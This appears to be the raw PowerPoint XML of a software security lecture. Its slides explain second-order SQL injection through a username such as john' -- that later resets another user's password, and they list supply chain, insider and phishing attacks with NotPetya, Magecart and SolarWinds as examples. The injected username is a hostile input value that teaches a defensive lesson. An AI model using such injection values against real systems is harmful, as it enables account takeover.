              <a:gd name="connsiteX7" fmla="*/ 1297086 w 2316188"/>
              <a:gd name="connsiteY7" fmla="*/ 1875211 h 2387001"/>
              <a:gd name="connsiteX8" fmla="*/ 808475 w 2316188"/>
              <a:gd name="connsiteY8" fmla="*/ 2384762 h 2387001"/>
              <a:gd name="connsiteX9" fmla="*/ 117440 w 2316188"/>
              <a:gd name="connsiteY9" fmla="*/ 2035755 h 2387001"/>
              <a:gd name="connsiteX10" fmla="*/ 12738 w 2316188"/>
              <a:gd name="connsiteY10" fmla="*/ 1442442 h 2387001"/>
              <a:gd name="connsiteX11" fmla="*/ 257043 w 2316188"/>
              <a:gd name="connsiteY11" fmla="*/ 1365660 h 2387001"/>
              <a:gd name="connsiteX12" fmla="*/ 494368 w 2316188"/>
              <a:gd name="connsiteY12" fmla="*/ 1512243 h 2387001"/>
              <a:gd name="connsiteX13" fmla="*/ 682832 w 2316188"/>
              <a:gd name="connsiteY13" fmla="*/ 1861251 h 2387001"/>
              <a:gd name="connsiteX14" fmla="*/ 1304066 w 2316188"/>
              <a:gd name="connsiteY14" fmla="*/ 1875211 h 2387001"/>
              <a:gd name="connsiteX15" fmla="*/ 2281287 w 2316188"/>
              <a:gd name="connsiteY15" fmla="*/ 1749568 h 2387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16188" h="2387001">
                <a:moveTo>
                  <a:pt x="2316188" y="409379"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2107947" y="373315"/>
                  <a:pt x="1899706" y="337251"/>
                  <a:pt x="1708915" y="276756"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1518124" y="216261"/>
                  <a:pt x="1384338" y="87129"/>
                  <a:pt x="1171443" y="46411"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="958548" y="5693"/>
                  <a:pt x="496695" y="-26880"/>
                  <a:pt x="431547" y="32451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="366399" y="91782"/>
                  <a:pt x="594418" y="308167"/>
                  <a:pt x="780555" y="402399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="966692" y="496631"/>
                  <a:pt x="1437852" y="489651"/>
                  <a:pt x="1548371" y="597843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1658890" y="706035"/>
                  <a:pt x="1485550" y="838658"/>
                  <a:pt x="1443669" y="1051553"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1401788" y="1264448"/>
                  <a:pt x="1402952" y="1653010"/>
                  <a:pt x="1297086" y="1875211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1191220" y="2097412"/>
                  <a:pt x="1005083" y="2358005"/>
                  <a:pt x="808475" y="2384762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="611867" y="2411519"/>
                  <a:pt x="250063" y="2192808"/>
                  <a:pt x="117440" y="2035755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-15183" y="1878702"/>
                  <a:pt x="-10529" y="1554124"/>
                  <a:pt x="12738" y="1442442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36005" y="1330760"/>
                  <a:pt x="176771" y="1354027"/>
                  <a:pt x="257043" y="1365660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337315" y="1377293"/>
                  <a:pt x="423403" y="1429645"/>
                  <a:pt x="494368" y="1512243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="565333" y="1594841"/>
                  <a:pt x="547882" y="1800756"/>
                  <a:pt x="682832" y="1861251"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="817782" y="1921746"/>
                  <a:pt x="1037657" y="1893825"/>
                  <a:pt x="1304066" y="1875211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1570475" y="1856597"/>
                  <a:pt x="1925881" y="1803082"/>
                  <a:pt x="2281287" y="1749568"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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92125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24" name="Vrije vorm 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324018" y="2273203"/>
            <a:ext cx="1508349" cy="1385818"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 20941 w 1508349"/>
              <a:gd name="connsiteY0" fmla="*/ 337374 h 1385818"/>
              <a:gd name="connsiteX1" fmla="*/ 181484 w 1508349"/>
              <a:gd name="connsiteY1" fmla="*/ 23267 h 1385818"/>
              <a:gd name="connsiteX2" fmla="*/ 446730 w 1508349"/>
              <a:gd name="connsiteY2" fmla="*/ 23267 h 1385818"/>
              <a:gd name="connsiteX3" fmla="*/ 998162 w 1508349"/>
              <a:gd name="connsiteY3" fmla="*/ 30247 h 1385818"/>
              <a:gd name="connsiteX4" fmla="*/ 1319249 w 1508349"/>
              <a:gd name="connsiteY4" fmla="*/ 16287 h 1385818"/>
              <a:gd name="connsiteX5" fmla="*/ 1500733 w 1508349"/>
              <a:gd name="connsiteY5" fmla="*/ 120989 h 1385818"/>
              <a:gd name="connsiteX6" fmla="*/ 1472813 w 1508349"/>
              <a:gd name="connsiteY6" fmla="*/ 393215 h 1385818"/>
              <a:gd name="connsiteX7" fmla="*/ 1458852 w 1508349"/>
              <a:gd name="connsiteY7" fmla="*/ 916727 h 1385818"/>
              <a:gd name="connsiteX8" fmla="*/ 1095884 w 1508349"/>
              <a:gd name="connsiteY8" fmla="*/ 546779 h 1385818"/>
              <a:gd name="connsiteX9" fmla="*/ 1012122 w 1508349"/>
              <a:gd name="connsiteY9" fmla="*/ 923707 h 1385818"/>
              <a:gd name="connsiteX10" fmla="*/ 1319249 w 1508349"/>
              <a:gd name="connsiteY10" fmla="*/ 1119151 h 1385818"/>
              <a:gd name="connsiteX11" fmla="*/ 1207567 w 1508349"/>
              <a:gd name="connsiteY11" fmla="*/ 1335536 h 1385818"/>
              <a:gd name="connsiteX12" fmla="*/ 711976 w 1508349"/>
              <a:gd name="connsiteY12" fmla="*/ 1377417 h 1385818"/>
              <a:gd name="connsiteX13" fmla="*/ 544452 w 1508349"/>
              <a:gd name="connsiteY13" fmla="*/ 1209893 h 1385818"/>
              <a:gd name="connsiteX14" fmla="*/ 802718 w 1508349"/>
              <a:gd name="connsiteY14" fmla="*/ 923707 h 1385818"/>
              <a:gd name="connsiteX15" fmla="*/ 921380 w 1508349"/>
              <a:gd name="connsiteY15" fmla="*/ 784104 h 1385818"/>
              <a:gd name="connsiteX16" fmla="*/ 725936 w 1508349"/>
              <a:gd name="connsiteY16" fmla="*/ 658461 h 1385818"/>
              <a:gd name="connsiteX17" fmla="*/ 502571 w 1508349"/>
              <a:gd name="connsiteY17" fmla="*/ 819005 h 1385818"/>
              <a:gd name="connsiteX18" fmla="*/ 279206 w 1508349"/>
              <a:gd name="connsiteY18" fmla="*/ 916727 h 1385818"/>
              <a:gd name="connsiteX19" fmla="*/ 0 w 1508349"/>
              <a:gd name="connsiteY19" fmla="*/ 902766 h 138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08349" h="1385818">
                <a:moveTo>
                  <a:pt x="20941" y="337374"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="65730" y="206496"/>
                  <a:pt x="110519" y="75618"/>
                  <a:pt x="181484" y="23267"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252449" y="-29084"/>
                  <a:pt x="446730" y="23267"/>
                  <a:pt x="446730" y="23267"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="998162" y="30247"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1143582" y="29084"/>
                  <a:pt x="1235487" y="1163"/>
                  <a:pt x="1319249" y="16287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1403011" y="31411"/>
                  <a:pt x="1475139" y="58168"/>
                  <a:pt x="1500733" y="120989"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1526327" y="183810"/>
                  <a:pt x="1479793" y="260592"/>
                  <a:pt x="1472813" y="393215"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1465833" y="525838"/>
                  <a:pt x="1521673" y="891133"/>
                  <a:pt x="1458852" y="916727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1396031" y="942321"/>
                  <a:pt x="1170339" y="545616"/>
                  <a:pt x="1095884" y="546779"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1021429" y="547942"/>
                  <a:pt x="974895" y="828312"/>
                  <a:pt x="1012122" y="923707"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1049349" y="1019102"/>
                  <a:pt x="1286675" y="1050513"/>
                  <a:pt x="1319249" y="1119151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1351823" y="1187789"/>
                  <a:pt x="1308779" y="1292492"/>
                  <a:pt x="1207567" y="1335536"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1106355" y="1378580"/>
                  <a:pt x="822495" y="1398357"/>
                  <a:pt x="711976" y="1377417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="601457" y="1356477"/>
                  <a:pt x="529328" y="1285511"/>
                  <a:pt x="544452" y="1209893"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="559576" y="1134275"/>
                  <a:pt x="739897" y="994672"/>
                  <a:pt x="802718" y="923707"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="865539" y="852742"/>
                  <a:pt x="934177" y="828312"/>
                  <a:pt x="921380" y="784104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="908583" y="739896"/>
                  <a:pt x="795737" y="652644"/>
                  <a:pt x="725936" y="658461"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="656135" y="664278"/>
                  <a:pt x="577026" y="775961"/>
                  <a:pt x="502571" y="819005"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="428116" y="862049"/>
                  <a:pt x="362968" y="902767"/>
                  <a:pt x="279206" y="916727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195444" y="930687"/>
                  <a:pt x="97722" y="916726"/>
                  <a:pt x="0" y="902766"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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92125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5" name="Rechthoek 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5354084" y="3712325"/>
            <a:ext cx="151346" cy="514512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92125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345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dirty="0"/>
              <a:t>Example: 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" baseline="30000" dirty="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0"/>
              <a:t> order SQL injection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1600" dirty="0"/>
              <a:t>Suppose I want to access John's account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>I register an account for myself with the name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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john' -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>I log in as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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john' -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>and change my password </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>If the password change is done with the SQL statement  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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33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UPDATE users                                                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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33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SET password='abcd1234'                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33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WHERE username='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john' --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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 password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1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</a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>then I have reset John's password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl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abcd1234 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>is user input, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the dangerous input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from the server's own database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>earlier</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>The moral of the story:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input, not even data coming from sources you think can trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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27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72666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79803"/>
            <a:ext cx="5867400" cy="4788727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85800" y="276225"/>
            <a:ext cx="7761288" cy="685009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0"/>
              <a:t>Other attack vectors,  besides these input possibilities?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" baseline="-25000" dirty="0">
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/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4A9004D-2E4E-45C3-A21A-70BF82E4DD2D}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Rechte verbindingslijn met pijl 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3301997" y="1669733"/>
            <a:ext cx="2779848" cy="212597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8" name="Rechte verbindingslijn met pijl 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2775127" y="3034340"/>
            <a:ext cx="3306718" cy="885367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9" name="Rechte verbindingslijn met pijl 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3779912" y="4165459"/>
            <a:ext cx="2301933" cy="415671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13" name="Rechte verbindingslijn met pijl 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1835696" y="4320532"/>
            <a:ext cx="4320480" cy="764653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25" name="Tekstvak 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151933" y="3674201"/>
            <a:ext cx="1944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Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>INPUT</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Pieces NF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98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79803"/>
            <a:ext cx="5867400" cy="4788727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85800" y="276225"/>
            <a:ext cx="7761288" cy="685009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0"/>
              <a:t>Other attack vectors,  besides these input possibilities?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" baseline="-25000" dirty="0">
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/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4A9004D-2E4E-45C3-A21A-70BF82E4DD2D}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4" descr="Drawing Figure with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FC5BABA-1F8B-A366-902E-88F9C97425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72417" y="1094752"/>
            <a:ext cx="1164808" cy="1164808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Graphic 10" descr="Drawing Figure with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{046CF36A-9F4F-4BB7-1463-E3E02477B4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6524" y="4299668"/>
            <a:ext cx="1097061" cy="1097061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13" descr="Drawing Figure with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86930180-597E-46B3-C440-87F4230FB1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65793" y="2818003"/>
            <a:ext cx="1097061" cy="10970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3A2B0C-64A4-0543-517F-1159BF235F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366928" y="5057762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user</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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68925F-582D-8249-E929-952D511A7E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7303442" y="1955799"/>
            <a:ext cx="1305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developer</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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2AE4C0-E81F-9220-3A26-43438B07AD9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7301151" y="3459293"/>
            <a:ext cx="1302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sys admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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AA39FF-875C-3789-EE2B-A2D6E983DC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4100459" y="2097919"/>
            <a:ext cx="28388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Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>humans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Pieces NF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89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79803"/>
            <a:ext cx="5867400" cy="4788727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85800" y="276225"/>
            <a:ext cx="7761288" cy="685009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Other attack vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" baseline="-25000" dirty="0">
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/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4A9004D-2E4E-45C3-A21A-70BF82E4DD2D}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Tekstvak 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923928" y="1988840"/>
            <a:ext cx="4320480" cy="31085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Less obvious attack vectors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2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Supply chain attacks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Insider attacks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developers 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sys admin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Phishing to attack users, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600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eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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https://c0mpany.nl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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0324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8B19E-313F-9B02-9E59-50C334028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closed source vs open source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91386-8F1C-4597-DE0D-9E0929648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Who thinks open source code is more secure                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>            than closed / proprietary code?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1800" dirty="0"/>
              <a:t>It depends... some open source is crappy, some closed source is great, and vice versa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>More importantly, for most applications, the distinction is meaningless: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>most proprietary code relies on huge quantities of open source libraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>thanks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, Maven, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Pypi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Extra/bigger risk with open source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>supply chain attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB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48A6C-FE81-2CA4-9952-FEA838CAD5C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31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64653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Supply chain attacks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>NotPetya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>MegaCart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>Solarwinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2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400" dirty="0"/>
              <a:t>https://www.wired.com/story/magecart-amazon-cloud-hacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
